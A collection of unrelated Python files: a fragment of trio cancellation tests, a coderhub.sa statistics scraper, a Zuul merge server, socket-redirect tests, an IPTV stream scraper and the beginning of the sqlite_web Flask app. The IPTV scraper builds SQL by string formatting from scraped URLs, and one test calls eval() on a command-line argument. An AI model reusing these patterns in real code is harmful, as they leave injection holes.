task = _core.current_task()
def abort_fn(_): # pragma: no cover
return _core.Abort.FAILED
got = await _core.temporarily_detach_coroutine_object(abort_fn)
assert got == "not trio!"
await async_yield(1)
await async_yield(2)
with pytest.raises(RuntimeError) as excinfo:
await _core.reattach_detached_coroutine_object(unrelated_task, None)
assert "does not match" in str(excinfo.value)
await _core.reattach_detached_coroutine_object(task, "byebye")
await sleep(0)
async with _core.open_nursery() as nursery:
nursery.start_soon(unrelated_coroutine)
nursery.start_soon(reattachable_coroutine)
await wait_all_tasks_blocked()
assert unrelated_task is not None
assert task is not None
# Okay, it's detached. Here's our coroutine runner:
assert task.coro.send("not trio!") == 1
assert task.coro.send(None) == 2
assert task.coro.send(None) == "byebye"
# Now it's been reattached, and we can leave the nursery
async def test_detached_coroutine_cancellation():
abort_fn_called = False
task = None
async def reattachable_coroutine():
await sleep(0)
nonlocal task
task = _core.current_task()
def abort_fn(_):
nonlocal abort_fn_called
abort_fn_called = True
return _core.Abort.FAILED
await _core.temporarily_detach_coroutine_object(abort_fn)
await _core.reattach_detached_coroutine_object(task, None)
with pytest.raises(_core.Cancelled):
await sleep(0)
async with _core.open_nursery() as nursery:
nursery.start_soon(reattachable_coroutine)
await wait_all_tasks_blocked()
assert task is not None
nursery.cancel_scope.cancel()
task.coro.send(None)
assert abort_fn_called
@restore_unraisablehook()
def test_async_function_implemented_in_C():
# These used to crash because we'd try to mutate the coroutine object's
# cr_frame, but C functions don't have Python frames.
async def agen_fn(record):
assert not _core.currently_ki_protected()
record.append("the generator ran")
yield
run_record = []
agen = agen_fn(run_record)
_core.run(agen.__anext__)
assert run_record == ["the generator ran"]
async def main():
start_soon_record = []
agen = agen_fn(start_soon_record)
async with _core.open_nursery() as nursery:
nursery.start_soon(agen.__anext__)
assert start_soon_record == ["the generator ran"]
_core.run(main)
async def test_very_deep_cancel_scope_nesting():
# This used to crash with a RecursionError in CancelStatus.recalculate
with ExitStack() as exit_stack:
outermost_scope = _core.CancelScope()
exit_stack.enter_context(outermost_scope)
for _ in range(5000):
exit_stack.enter_context(_core.CancelScope())
outermost_scope.cancel()
async def test_cancel_scope_deadline_duplicates():
# This exercises an assert in Deadlines._prune, by intentionally creating
# duplicate entries in the deadline heap.
now = _core.current_time()
with _core.CancelScope() as cscope:
for _ in range(DEADLINE_HEAP_MIN_PRUNE_THRESHOLD * 2):
cscope.deadline = now + 9998
cscope.deadline = now + 9999
await sleep(0.01)
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_simple_cancel_scope_usage_doesnt_create_cyclic_garbage():
# https://github.com/python-trio/trio/issues/1770
gc.collect()
async def do_a_cancel():
with _core.CancelScope() as cscope:
cscope.cancel()
await sleep_forever()
async def crasher():
raise ValueError
old_flags = gc.get_debug()
try:
gc.collect()
gc.set_debug(gc.DEBUG_SAVEALL)
# cover outcome.Error.unwrap
# (See https://github.com/python-trio/outcome/pull/29)
await do_a_cancel()
# cover outcome.Error.unwrap if unrolled_run hangs on to exception refs
# (See https://github.com/python-trio/trio/pull/1864)
await do_a_cancel()
with pytest.raises(ValueError):
async with _core.open_nursery() as nursery:
# cover MultiError.filter and NurseryManager.__aexit__
nursery.start_soon(crasher)
gc.collect()
assert not gc.garbage
finally:
gc.set_debug(old_flags)
gc.garbage.clear()
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_cancel_scope_exit_doesnt_create_cyclic_garbage():
# https://github.com/python-trio/trio/pull/2063
gc.collect()
async def crasher():
raise ValueError
old_flags = gc.get_debug()
try:
with pytest.raises(ValueError), _core.CancelScope() as outer:
async with _core.open_nursery() as nursery:
gc.collect()
gc.set_debug(gc.DEBUG_SAVEALL)
# One child that gets cancelled by the outer scope
nursery.start_soon(sleep_forever)
outer.cancel()
# And one that raises a different error
nursery.start_soon(crasher)
# so that outer filters a Cancelled from the MultiError and
# covers CancelScope.__exit__ (and NurseryManager.__aexit__)
# (See https://github.com/python-trio/trio/pull/2063)
gc.collect()
assert not gc.garbage
finally:
gc.set_debug(old_flags)
gc.garbage.clear()
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_nursery_cancel_doesnt_create_cyclic_garbage():
# https://github.com/python-trio/trio/issues/1770#issuecomment-730229423
def toggle_collected():
nonlocal collected
collected = True
collected = False
gc.collect()
old_flags = gc.get_debug()
try:
gc.set_debug(0)
gc.collect()
gc.set_debug(gc.DEBUG_SAVEALL)
# cover Nursery._nested_child_finished
async with _core.open_nursery() as nursery:
nursery.cancel_scope.cancel()
weakref.finalize(nursery, toggle_collected)
del nursery
# a checkpoint clears the nursery from the internals, apparently
# TODO: stop event loop from hanging on to the nursery at this point
await _core.checkpoint()
assert collected
gc.collect()
assert not gc.garbage
finally:
gc.set_debug(old_flags)
gc.garbage.clear()
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_locals_destroyed_promptly_on_cancel():
destroyed = False
def finalizer():
nonlocal destroyed
destroyed = True
class A:
pass
async def task():
a = A()
weakref.finalize(a, finalizer)
await _core.checkpoint()
async with _core.open_nursery() as nursery:
nursery.start_soon(task)
nursery.cancel_scope.cancel()
assert destroyed
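# --- Illustrative sketch ---
# A minimal, hedged example of the CancelScope shield semantics that several of
# the tests above exercise, written against trio's public API. The name
# `shield_demo` is used only for this illustration; it is not part of trio.
async def shield_demo():
    import trio

    with trio.CancelScope() as outer:
        outer.cancel()
        with trio.CancelScope(shield=True):
            # The shield blocks the outer cancellation, so this checkpoint
            # completes instead of raising Cancelled.
            await trio.sleep(0)
        # Once the shielded scope is exited, the next checkpoint inside
        # `outer` would raise Cancelled, which `outer` absorbs on exit.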
|
coderhub_stats.py
|
"""
the purpose of this file is to collect data from the coderhub.sa API, then prepare
and group it to make it easier to start analysing the data
"""
import pandas as pd
import time
from coderhub import CoderHub
import threading
import requests
class CoderHubStats(CoderHub):
users_data = {}
threads_lst = []
def get_challenges_stats(self) -> dict:
"""
        get easy challenges count, medium challenges count, hard
        challenges count, and the count of all challenges together
Example result :
all_challenges 98.00
easy_challenges 56.00
medium_challenges 31.00
hard_challenges 11.00
easy_challenges_percentage 57.14
medium_challenges_percentage 31.63
hard_challenges_percentage 11.22
Returns:
            dict
Exceptions :
- requests.exceptions.ConnectionError
"""
load_data = CoderHub.get_challenges(self)
df = pd.json_normalize(load_data['result'])
# count challenges
all_challenges_count = len(df)
easy_challenges_count = len(df[df["type_of_level.name"] == "سهل"])
med_challenges_count = len(df[df["type_of_level.name"] == "متوسط"])
hard_challenges_count = len(df[df["type_of_level.name"] == "صعب"])
# calculate challenges percentages
easy_challenges_percentage = (easy_challenges_count/all_challenges_count)*100
med_challenges_percentage = (med_challenges_count/all_challenges_count)*100
hard_challenges_percentage = (hard_challenges_count/all_challenges_count)*100
# rounding numbers
easy_challenges_percentage = round(easy_challenges_percentage, 2)
med_challenges_percentage = round(med_challenges_percentage, 2)
hard_challenges_percentage = round(hard_challenges_percentage, 2)
challenges_stats = {
'all_challenges': all_challenges_count,
'easy_challenges': easy_challenges_count,
'medium_challenges': med_challenges_count,
'hard_challenges': hard_challenges_count,
'easy_challenges_percentage': easy_challenges_percentage,
'medium_challenges_percentage': med_challenges_percentage,
'hard_challenges_percentage': hard_challenges_percentage
}
return challenges_stats
def get_languages_names(self):
"""
Returns:
            a list containing all programming language names available in coderhub.sa
Exceptions :
- requests.exceptions.ConnectionError
"""
load_data = CoderHub.get_languages(self)
languages = [i['name'] for i in load_data['result']]
return languages
def get_leaderboard_datatable(self) -> pd.DataFrame:
"""
        get the top 10 users for every language, with their rank and points, from the leaderboard
Example result :
users points rank language
0 ahmed0ksa 921.0 1 swift
1 alxd7my 911.0 2 swift
2 iX901 906.0 3 swift
3 ahmadajr1 906.0 4 swift
4 vdotup 906.0 5 swift
Returns:
pandas.DataFrame
Exceptions :
- requests.exceptions.ConnectionError
"""
leaderboard_df = pd.DataFrame()
pts_lst = []
rnk_lst = []
lng_lst = []
users_lst = []
for lang in self.get_languages_names():
top10_users = self.get_leaderBoard(lang)['leaderboard']
for user in top10_users:
pts_lst.append(user['points'])
rnk_lst.append(user['rank'])
lng_lst.append(str(lang))
users_lst.append(user['user_info']['username'])
leaderboard_df.insert(0, "language", lng_lst)
leaderboard_df.insert(0, "rank", rnk_lst)
leaderboard_df.insert(0, "points", pts_lst)
leaderboard_df.insert(0, "users", users_lst)
return leaderboard_df
def fetch_user_data(self, user):
"""
        fetch user information (provided by the API) and add it to the users_data
        dictionary; if the user's profile is private, the value stored for that user is 'private'
Args:
user:
username that will be passed to get_user_statistics()
Returns:
None
Exceptions :
- requests.exceptions.ConnectionError
"""
try:
user_data = self.get_user_statistics(user)
self.users_data[str(user)] = user_data
        except Exception:
self.users_data[str(user)] = "private"
def get_top_users_stats(self) -> pd.DataFrame:
"""
        expand the data returned by get_leaderboard_datatable() with more information
Example result :
users points rank language total_challenges_solved total_challenges_solved_all_languages ...
0 ahmed0ksa 921 1 swift 107 107
1 alxd7my 911 2 swift 106 114
2 iX901 906 3 swift 105 105
3 ahmadajr1 906 4 swift 105 105
4 nnoaid 906 8 python private private
...
Returns:
            pandas.DataFrame
Exceptions :
- requests.exceptions.ConnectionError
"""
leaderboard_datatable = self.get_leaderboard_datatable()
users_lst = leaderboard_datatable['users']
languages_lst = leaderboard_datatable['language']
total_solved_challenges = []
total_solved_challenges_all_languages = []
total_easy_solved = []
total_med_solved = []
total_hard_solved = []
total_points = []
start_timer = time.perf_counter()
for user in users_lst:
x = threading.Thread(target=self.fetch_user_data, args=(user,))
self.threads_lst.append(x)
x.start()
for thread in self.threads_lst:
thread.join()
for index, user in enumerate(users_lst):
easy_challenges_counter = 0
med_challenges_counter = 0
hard_challenges_counter = 0
user_data = self.users_data[str(user)]
if user_data != "private":
total_solved_challenges_all_languages.append(user_data['total_solved_challenges'])
for user_language in user_data['programming_languages']:
if user_language['name'] == "سهل":
easy_challenges_counter = easy_challenges_counter + user_language['solved_challenges']
elif user_language['name'] == "متوسط":
med_challenges_counter = med_challenges_counter + user_language['solved_challenges']
else:
hard_challenges_counter = hard_challenges_counter + user_language['solved_challenges']
total_easy_solved.append(easy_challenges_counter)
total_med_solved.append(med_challenges_counter)
total_hard_solved.append(hard_challenges_counter)
points = (easy_challenges_counter*5) + (med_challenges_counter*10) + (hard_challenges_counter*20)
total_points.append(points)
for user_languages in user_data['total_solved_per_programming_language']:
if user_languages['programming_language_name'].lower() == languages_lst[index].lower():
total_solved_challenges.append(user_languages['total_solved'])
break
else:
continue
else:
                # user's profile is private, so per-language details are unavailable
total_easy_solved.append("private")
total_med_solved.append("private")
total_hard_solved.append("private")
total_points.append("private")
total_solved_challenges.append("private")
total_solved_challenges_all_languages.append("private")
continue
end_timer = time.perf_counter()
leaderboard_datatable.insert(4, "total_challenges_solved", total_solved_challenges)
leaderboard_datatable.insert(5, "total_challenges_solved_all_languages", total_solved_challenges_all_languages)
leaderboard_datatable.insert(6, "total_easy_solved", total_easy_solved)
leaderboard_datatable.insert(7, "total_medium_solved", total_med_solved)
leaderboard_datatable.insert(8, "total_hard_solved", total_hard_solved)
leaderboard_datatable.insert(9, "total_points_all_challenges", total_points)
print(f"total time : {end_timer - start_timer} seconds")
return leaderboard_datatable
def get_user_total_points(self, username:str):
user_id = self.get_user_id(username)
total_points = requests.get(f"https://api.coderhub.sa/api/profile/get-user-points/{user_id}").json()
return total_points
def get_user_stats(self, username: str):
user_data = self.get_user_statistics(username=username)
total_solved_all_lang = user_data['total_solved_challenges']
total_points_data = self.get_user_total_points(username)
total_points = []
user_lang = []
total_solved_per_programming_language = []
user_lang_data = []
easy_solved = []
medium_solved = []
hard_solved = []
total_solved = []
for data in user_data['total_solved_per_programming_language']:
user_lang.append(data['programming_language_name'])
total_solved_per_programming_language.append(data['total_solved'])
for lang in user_lang:
for points in total_points_data:
if points['langauge_name'] == str(lang):
lang_points = points["points"]
total_points.append(lang_points)
print(total_points)
solved_per_language = {}
for language in user_lang:
solved_per_language[str(language)] = []
for language in user_lang:
current_lang_easy_solved = 0
current_lang_med_solved = 0
current_lang_hard_solved = 0
for data in user_data['programming_languages']:
if data['programming_language_name'] == language:
if data['name'] == "سهل":
current_lang_easy_solved += data['solved_challenges']
elif data['name'] == "متوسط":
current_lang_med_solved += data['solved_challenges']
elif data['name'] == "صعب":
current_lang_hard_solved += data['solved_challenges']
user_lang_data.append({f"{language}": [current_lang_easy_solved,
current_lang_med_solved,
current_lang_hard_solved]})
for lang_data, lang in zip(user_lang_data, user_lang):
lang_data[str(lang)].append(sum(lang_data[str(lang)]))
lang_data[str(lang)].append(
(lang_data[str(lang)][0] * 5) +
(lang_data[str(lang)][1] * 10) +
(lang_data[str(lang)][2] * 20)
)
for lang, lang_data in zip(user_lang, user_lang_data):
easy_solved.append(lang_data[str(lang)][0])
medium_solved.append(lang_data[str(lang)][1])
hard_solved.append(lang_data[str(lang)][2])
total_solved.append(lang_data[str(lang)][3])
df = pd.DataFrame()
df.insert(0, 'language', user_lang)
df.insert(0, 'easy_solved', easy_solved)
df.insert(0, 'medium_solved', medium_solved)
df.insert(0, 'hard_solved', hard_solved)
df.insert(0, 'total_solved', total_solved)
df.insert(0, 'total_points', total_points)
return df
cs = CoderHubStats()
print(cs.get_user_stats("nafiealhelaly"))
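# --- Illustrative sketch ---
# get_challenges_stats() returns a plain dict; wrapping it in a pandas Series is
# a convenient way to eyeball the counts and percentages. The function name
# `show_challenge_summary` is introduced here purely for illustration and is not
# part of the CoderHub API or the original script.
def show_challenge_summary():
    stats = CoderHubStats().get_challenges_stats()
    print(pd.Series(stats).round(2))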
|
server.py
|
# Copyright 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
import threading
import traceback
import gear
from zuul.merger import merger
class MergeServer(object):
log = logging.getLogger("zuul.MergeServer")
def __init__(self, config, connections={}):
self.config = config
self.zuul_url = config.get('merger', 'zuul_url')
if self.config.has_option('merger', 'git_dir'):
merge_root = self.config.get('merger', 'git_dir')
else:
merge_root = '/var/lib/zuul/git'
if self.config.has_option('merger', 'git_user_email'):
merge_email = self.config.get('merger', 'git_user_email')
else:
merge_email = None
if self.config.has_option('merger', 'git_user_name'):
merge_name = self.config.get('merger', 'git_user_name')
else:
merge_name = None
self.merger = merger.Merger(merge_root, connections, merge_email,
merge_name)
def start(self):
self._running = True
server = self.config.get('gearman', 'server')
if self.config.has_option('gearman', 'port'):
port = self.config.get('gearman', 'port')
else:
port = 4730
self.worker = gear.Worker('Zuul Merger')
self.worker.addServer(server, port)
self.log.debug("Waiting for server")
self.worker.waitForServer()
self.log.debug("Registering")
self.register()
self.log.debug("Starting worker")
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def register(self):
self.worker.registerFunction("merger:merge")
self.worker.registerFunction("merger:update")
def stop(self):
self.log.debug("Stopping")
self._running = False
self.worker.shutdown()
self.log.debug("Stopped")
def join(self):
self.thread.join()
def run(self):
self.log.debug("Starting merge listener")
while self._running:
try:
job = self.worker.getJob()
try:
if job.name == 'merger:merge':
self.log.debug("Got merge job: %s" % job.unique)
self.merge(job)
elif job.name == 'merger:update':
self.log.debug("Got update job: %s" % job.unique)
self.update(job)
else:
self.log.error("Unable to handle job %s" % job.name)
job.sendWorkFail()
except Exception:
self.log.exception("Exception while running job")
job.sendWorkException(traceback.format_exc())
except Exception:
self.log.exception("Exception while getting job")
def merge(self, job):
args = json.loads(job.arguments)
commit = self.merger.mergeChanges(args['items'])
result = dict(merged=(commit is not None),
commit=commit,
zuul_url=self.zuul_url)
job.sendWorkComplete(json.dumps(result))
def update(self, job):
args = json.loads(job.arguments)
self.merger.updateRepo(args['project'],
args['connection_name'],
args['url'])
result = dict(updated=True,
zuul_url=self.zuul_url)
job.sendWorkComplete(json.dumps(result))
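# --- Illustrative sketch ---
# MergeServer only needs a ConfigParser-style object exposing get()/has_option().
# The section and option names below come from the class above; the URL, host,
# and path are placeholder values for the example, not real defaults. Assumes
# Python 3's configparser (under Python 2 the module is ConfigParser).
if __name__ == '__main__':
    import configparser

    config = configparser.ConfigParser()
    config.read_dict({
        'merger': {'zuul_url': 'http://zuul.example.org/p',
                   'git_dir': '/var/lib/zuul/git'},
        'gearman': {'server': '127.0.0.1'},
    })
    server = MergeServer(config)
    server.start()  # registers merger:merge / merger:update and spawns the worker thread
    server.join()   # block until the worker thread exits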
|
test-socket_stream_redirect.py
|
"""
###############################################################################
test the socket_stream_redirect.py modes
###############################################################################
"""
import sys, os, multiprocessing
from socket_stream_redirect import *
###############################################################################
# redirected client output
###############################################################################
def server1():
mypid = os.getpid()
conn = initListenerSocket() # block till client connect
file = conn.makefile('r')
for i in range(3): # read/recv client's prints
data = file.readline().rstrip() # block till data ready
print('server %s got [%s]' % (mypid, data)) # print normally to terminal
def client1():
mypid = os.getpid()
redirectOut()
for i in range(3):
print('client %s: %s' % (mypid, i)) # print to socket
sys.stdout.flush() # else buffered till exits!
###############################################################################
# redirected client input
###############################################################################
def server2():
mypid = os.getpid() # raw socket not buffered
conn = initListenerSocket() # send to client's input
for i in range(3):
conn.send(('server %s: %s\n' % (mypid, i)).encode())
def client2():
mypid = os.getpid()
redirectIn()
for i in range(3):
data = input() # input from socket
print('client %s got [%s]' % (mypid, data)) # print normally to terminal
###############################################################################
# redirect client input + output, client is socket client
###############################################################################
def server3():
mypid = os.getpid()
conn = initListenerSocket() # wait for client connect
file = conn.makefile('r') # recv print(), send input()
for i in range(3): # readline blocks till data
data = file.readline().rstrip()
conn.send(('server %s got [%s]\n' % (mypid, data)).encode())
def client3():
mypid = os.getpid()
redirectBothAsClient()
for i in range(3):
print('client %s: %s' % (mypid, i)) # print to socket
data = input() # input from socket: flushes!
sys.stderr.write('client %s got [%s]\n' % (mypid, data)) # not redirected
###############################################################################
# redirect client input + output, client is socket server
###############################################################################
def server4():
mypid = os.getpid()
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, port))
file = sock.makefile('r')
for i in range(3):
sock.send(('server %s: %s\n' % (mypid, i)).encode()) # send to input()
data = file.readline().rstrip() # recv from print()
print('server %s got [%s]' % (mypid, data)) # result to terminal
def client4():
mypid = os.getpid()
redirectBothAsServer() # I'm actually the socket server in this mode
for i in range(3):
data = input() # input from socket: flushes!
print('client %s got [%s]' % (mypid, data)) # print to socket
sys.stdout.flush() # else last buffered till exit!
###############################################################################
# redirect client input + output, client is socket client, server xfers first
###############################################################################
def server5():
mypid = os.getpid() # test 4, but server accepts
conn = initListenerSocket() # wait for client connect
file = conn.makefile('r') # send input(), recv print()
for i in range(3):
conn.send(('server %s: %s\n' % (mypid, i)).encode())
data = file.readline().rstrip()
print('server %s got [%s]' % (mypid, data))
def client5():
mypid = os.getpid()
s = redirectBothAsClient() # I'm the socket client in this mode
for i in range(3):
data = input() # input from socket: flushes!
print('client %s got [%s]' % (mypid, data)) # print to socket
        sys.stdout.flush()                              # else last buffered till exit!
###############################################################################
# test by number on command-line
###############################################################################
if __name__ == '__main__':
server = eval('server' + sys.argv[1])
client = eval('client' + sys.argv[1]) # client in this process
multiprocessing.Process(target=server).start() # server in new process
client() # reset streams in client
#import time; time.sleep(5) # test effect of exit flush
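# Usage sketch: pick a test by number on the command line, e.g.
#   python test-socket_stream_redirect.py 1
# starts server1 in a child process and runs client1 in this one; modes 1-5
# all work the same way, and redirected prints only reach the peer once
# stdout is flushed or the client process exits.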
|
base.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import tools
import time
import re
import db
import threading
class Source (object) :
def __init__ (self):
self.T = tools.Tools()
self.now = int(time.time() * 1000)
def getSource (self) :
urlList = []
url = 'https://www.jianshu.com/p/2499255c7e79'
req = [
'user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Mobile Safari/537.36',
]
res = self.T.getPage(url, req)
if res['code'] == 200 :
pattern = re.compile(r"<code(.*?)</code>", re.I|re.S)
tmp = pattern.findall(res['body'])
pattern = re.compile(r"#EXTINF:0,(.*?)\n#EXTVLCOPT:network-caching=1000\n(.*?)\n", re.I|re.S)
sourceList = pattern.findall(tmp[0])
sourceList = sourceList + pattern.findall(tmp[1])
threads = []
for item in sourceList :
thread = threading.Thread(target = self.detectData, args = (item[0], item[1], ), daemon = True)
thread.start()
threads.append(thread)
for t in threads:
t.join()
else :
pass # MAYBE later :P
return urlList
def detectData (self, title, url) :
info = self.T.fmtTitle(title)
netstat = self.T.chkPlayable(url)
if netstat > 0 :
cros = 1 if self.T.chkCros(url) else 0
data = {
'title' : str(info['id']) if info['id'] != '' else str(info['title']),
'url' : str(url),
'quality': str(info['quality']),
'delay' : netstat,
'level' : str(info['level']),
'cros' : cros,
'online' : 1,
'udTime' : self.now,
}
self.addData(data)
print('Checking[ %s ]: %s' % (str(info['id']) + str(info['title']), url))
else :
pass # MAYBE later :P
def addData (self, data) :
DB = db.DataBase()
sql = "SELECT * FROM %s WHERE url = '%s'" % (DB.table, data['url'])
result = DB.query(sql)
if len(result) == 0 :
data['enable'] = 1
DB.insert(data)
else :
id = result[0][0]
DB.edit(id, data)
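# Illustrative sketch (not part of the scraper): detectData is fed entries
# that the regexes in getSource pull out of the page's <code> blocks, i.e.
# M3U-style records shaped like the following, where the channel name and
# URL are made-up placeholders:
#
#   #EXTINF:0,CCTV-1
#   #EXTVLCOPT:network-caching=1000
#   http://example.com/live/stream.m3u8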
|
sqlite_web.py
|
#!/usr/bin/env python
import datetime
import math
import operator
import optparse
import os
import re
import sys
import threading
import time
import webbrowser
from collections import namedtuple, OrderedDict
from functools import wraps
from getpass import getpass
from io import TextIOWrapper
# Py2k compat.
if sys.version_info[0] == 2:
PY2 = True
binary_types = (buffer, bytes, bytearray)
decode_handler = 'replace'
numeric = (int, long, float)
unicode_type = unicode
from StringIO import StringIO
else:
PY2 = False
binary_types = (bytes, bytearray)
decode_handler = 'backslashreplace'
numeric = (int, float)
unicode_type = str
from io import StringIO
try:
from flask import (
Flask, abort, escape, flash, jsonify, make_response, Markup, redirect,
render_template, request, session, url_for)
except ImportError:
raise RuntimeError('Unable to import flask module. Install by running '
'pip install flask')
try:
from pygments import formatters, highlight, lexers
except ImportError:
import warnings
warnings.warn('pygments library not found.', ImportWarning)
syntax_highlight = lambda data: '<pre>%s</pre>' % data
else:
def syntax_highlight(data):
if not data:
return ''
lexer = lexers.get_lexer_by_name('sql')
formatter = formatters.HtmlFormatter(linenos=False)
return highlight(data, lexer, formatter)
try:
from peewee import __version__
peewee_version = tuple([int(p) for p in __version__.split('.')])
except ImportError:
raise RuntimeError('Unable to import peewee module. Install by running '
'pip install peewee')
else:
if peewee_version <= (3, 0, 0):
raise RuntimeError('Peewee >= 3.0.0 is required. Found version %s. '
                       'Please update by running pip install --upgrade '
'peewee' % __version__)
from peewee import *
from peewee import IndexMetadata
from peewee import sqlite3
from playhouse.dataset import DataSet
from playhouse.migrate import migrate
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
MAX_RESULT_SIZE = 1000
ROWS_PER_PAGE = 50
SECRET_KEY = 'sqlite-database-browser-0.1.0'
app = Flask(
__name__,
static_folder=os.path.join(CUR_DIR, 'static'),
template_folder=os.path.join(CUR_DIR, 'templates'))
app.config.from_object(__name__)
dataset = None
migrator = None
#
# Database metadata objects.
#
TriggerMetadata = namedtuple('TriggerMetadata', ('name', 'sql'))
ViewMetadata = namedtuple('ViewMetadata', ('name', 'sql'))
#
# Database helpers.
#
class SqliteDataSet(DataSet):
@property
def filename(self):
db_file = dataset._database.database
if db_file.startswith('file:'):
db_file = db_file[5:]
return os.path.realpath(db_file.rsplit('?', 1)[0])
@property
def is_readonly(self):
db_file = dataset._database.database
return db_file.endswith('?mode=ro')
@property
def base_name(self):
return os.path.basename(self.filename)
@property
def created(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_ctime)
@property
def modified(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_mtime)
@property
def size_on_disk(self):
stat = os.stat(self.filename)
return stat.st_size
def get_indexes(self, table):
return dataset._database.get_indexes(table)
def get_all_indexes(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('index',))
return [IndexMetadata(row[0], row[1], None, None, None)
for row in cursor.fetchall()]
def get_columns(self, table):
return dataset._database.get_columns(table)
def get_foreign_keys(self, table):
return dataset._database.get_foreign_keys(table)
def get_triggers(self, table):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? AND tbl_name = ?',
('trigger', table))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_triggers(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('trigger',))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_views(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('view',))
return [ViewMetadata(*row) for row in cursor.fetchall()]
def get_virtual_tables(self):
cursor = self.query(
'SELECT name FROM sqlite_master '
'WHERE type = ? AND sql LIKE ? '
'ORDER BY name',
('table', 'CREATE VIRTUAL TABLE%'))
return set([row[0] for row in cursor.fetchall()])
def get_corollary_virtual_tables(self):
virtual_tables = self.get_virtual_tables()
suffixes = ['content', 'docsize', 'segdir', 'segments', 'stat']
return set(
'%s_%s' % (virtual_table, suffix) for suffix in suffixes
for virtual_table in virtual_tables)
def get_saved_queries(self):
cursor = self.query(
'SELECT name, query, id FROM jimber_queries'
)
return set([row for row in cursor.fetchall()])
#
# Flask views.
#
@app.route('/')
def index():
return render_template('index.html', sqlite=sqlite3)
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
if request.form.get('password') == app.config['PASSWORD']:
session['authorized'] = True
return redirect(session.get('next_url') or url_for('index'))
flash('The password you entered is incorrect.', 'danger')
return render_template('login.html')
@app.route('/logout/', methods=['GET'])
def logout():
session.pop('authorized', None)
return redirect(url_for('login'))
def require_table(fn):
@wraps(fn)
def inner(table, *args, **kwargs):
if table not in dataset.tables:
abort(404)
return fn(table, *args, **kwargs)
return inner
@app.route('/create-table/', methods=['POST'])
def table_create():
table = (request.form.get('table_name') or '').strip()
if not table:
flash('Table name is required.', 'danger')
return redirect(request.form.get('redirect') or url_for('index'))
dataset[table]
return redirect(url_for('table_import', table=table))
@app.route('/<table>/')
@require_table
def table_structure(table):
ds_table = dataset[table]
model_class = ds_table.model_class
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_structure.html',
columns=dataset.get_columns(table),
ds_table=ds_table,
foreign_keys=dataset.get_foreign_keys(table),
indexes=dataset.get_indexes(table),
model_class=model_class,
table=table,
table_sql=table_sql,
triggers=dataset.get_triggers(table))
def get_request_data():
if request.method == 'POST':
return request.form
return request.args
@app.route('/<table>/add-column/', methods=['GET', 'POST'])
@require_table
def add_column(table):
column_mapping = OrderedDict((
('VARCHAR', CharField),
('TEXT', TextField),
('INTEGER', IntegerField),
('REAL', FloatField),
('BOOL', BooleanField),
('BLOB', BlobField),
('DATETIME', DateTimeField),
('DATE', DateField),
('TIME', TimeField),
('DECIMAL', DecimalField)))
request_data = get_request_data()
col_type = request_data.get('type')
name = request_data.get('name', '')
if request.method == 'POST':
if name and col_type in column_mapping:
migrate(
migrator.add_column(
table,
name,
column_mapping[col_type](null=True)))
flash('Column "%s" was added successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name and column type are required.', 'danger')
return render_template(
'add_column.html',
col_type=col_type,
column_mapping=column_mapping,
name=name,
table=table)
@app.route('/<table>/drop-column/', methods=['GET', 'POST'])
@require_table
def drop_column(table):
request_data = get_request_data()
name = request_data.get('name', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if name in column_names:
migrate(migrator.drop_column(table, name))
flash('Column "%s" was dropped successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name is required.', 'danger')
return render_template(
'drop_column.html',
columns=columns,
column_names=column_names,
name=name,
table=table)
@app.route('/<table>/rename-column/', methods=['GET', 'POST'])
@require_table
def rename_column(table):
request_data = get_request_data()
rename = request_data.get('rename', '')
rename_to = request_data.get('rename_to', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if (rename in column_names) and (rename_to not in column_names):
migrate(migrator.rename_column(table, rename, rename_to))
flash('Column "%s" was renamed successfully!' % rename, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Column name is required and cannot conflict with an '
'existing column\'s name.', 'danger')
return render_template(
'rename_column.html',
columns=columns,
column_names=column_names,
rename=rename,
rename_to=rename_to,
table=table)
@app.route('/<table>/add-index/', methods=['GET', 'POST'])
@require_table
def add_index(table):
request_data = get_request_data()
indexed_columns = request_data.getlist('indexed_columns')
unique = bool(request_data.get('unique'))
columns = dataset.get_columns(table)
if request.method == 'POST':
if indexed_columns:
migrate(
migrator.add_index(
table,
indexed_columns,
unique))
flash('Index created successfully.', 'success')
return redirect(url_for('table_structure', table=table))
else:
